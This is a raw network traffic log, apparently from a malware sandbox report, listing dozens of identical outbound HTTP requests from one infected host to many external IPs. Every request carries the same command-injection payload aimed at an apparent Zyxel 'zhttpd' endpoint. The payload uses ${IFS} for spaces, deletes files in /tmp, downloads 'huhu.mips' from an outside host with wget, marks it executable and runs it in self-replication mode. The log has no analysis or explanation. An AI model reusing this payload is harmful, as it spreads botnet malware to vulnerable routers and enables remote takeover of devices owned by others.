                                                Jan 29, 2024 07:08:04.679277897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8445192.168.2.2360516150.50.112.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.679315090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8446192.168.2.2358854136.169.180.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.679364920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8447192.168.2.234950447.127.103.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.679408073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8448192.168.2.2354360145.186.23.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.679433107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8449192.168.2.2349968131.152.24.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.679512978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8450192.168.2.234314034.17.109.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.679559946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8451192.168.2.2354248120.155.246.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.679598093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8452192.168.2.2338556182.144.117.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.679615021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8453192.168.2.233552614.148.118.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.679661989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8454192.168.2.233647031.47.5.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.679706097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8455192.168.2.2350138107.45.204.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.679740906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8456192.168.2.2347918139.59.174.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.679804087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8457192.168.2.2336972122.122.31.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.679836035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8458192.168.2.235732624.70.1.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.679866076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8459192.168.2.236006818.226.94.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.679891109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8460192.168.2.2357138144.28.234.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.679950953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8461192.168.2.2352324128.107.108.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.679970026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8462192.168.2.2341590102.221.65.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.679997921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8463192.168.2.2352814143.79.120.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.680047989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8464192.168.2.2344546202.92.69.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.680080891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8465192.168.2.2336302176.132.148.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.680107117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8466192.168.2.2341016167.252.211.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.680145979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8467192.168.2.2346218104.67.229.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.680197954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8468192.168.2.234986883.67.91.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.680257082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8469192.168.2.233608014.155.6.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.680289984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8470192.168.2.2354292182.214.159.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.680322886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8471192.168.2.2346520134.177.79.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.680372953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8472192.168.2.2356944162.5.49.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.680407047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8473192.168.2.2336418197.115.58.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.680445910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8474192.168.2.2350370171.141.159.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.680502892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8475192.168.2.235604249.55.98.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.680527925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8476192.168.2.233374257.210.36.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.680562019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8477192.168.2.2350000121.230.221.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.680607080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8478192.168.2.234842837.212.135.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.680660009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8479192.168.2.2346718176.156.217.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.680691957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8480192.168.2.233708670.54.18.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.680743933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8481192.168.2.2350084158.39.20.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.680775881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8482192.168.2.2346730213.184.206.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.680819035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8483192.168.2.2338610219.23.50.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.680867910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8484192.168.2.235289850.57.5.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.680896997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8485192.168.2.233546445.149.243.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.680959940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8486192.168.2.234244061.219.38.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.680979013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8487192.168.2.2354404210.57.190.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.681010962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8488192.168.2.2334062150.39.4.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.681061029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8489192.168.2.234961467.117.202.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.681113005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8490192.168.2.233556659.218.139.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.681150913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8491192.168.2.2359946181.27.133.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.681181908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8492192.168.2.234735653.31.50.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.681230068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8493192.168.2.236051248.172.92.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.681266069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8494192.168.2.2346978207.105.251.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.681315899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8495192.168.2.2354646148.184.132.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.681344032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8496192.168.2.2342490141.131.120.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.681384087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8497192.168.2.235581043.210.0.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.681411982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8498192.168.2.236061649.134.96.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.681447983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8499192.168.2.234376891.70.7.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.681490898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8500192.168.2.2333568119.23.208.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.681559086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8501192.168.2.2347024221.118.152.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.681564093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8502192.168.2.233384023.208.93.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.681615114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8503192.168.2.2341868171.73.66.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.681655884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8504192.168.2.2352590128.180.172.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.681698084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8505192.168.2.2341396110.60.42.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.681729078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8506192.168.2.234928412.52.175.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.681777000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8507192.168.2.2352844170.3.27.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.681814909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8508192.168.2.2350118169.128.101.4443
                                                TimestampBytes transferredDirectionData
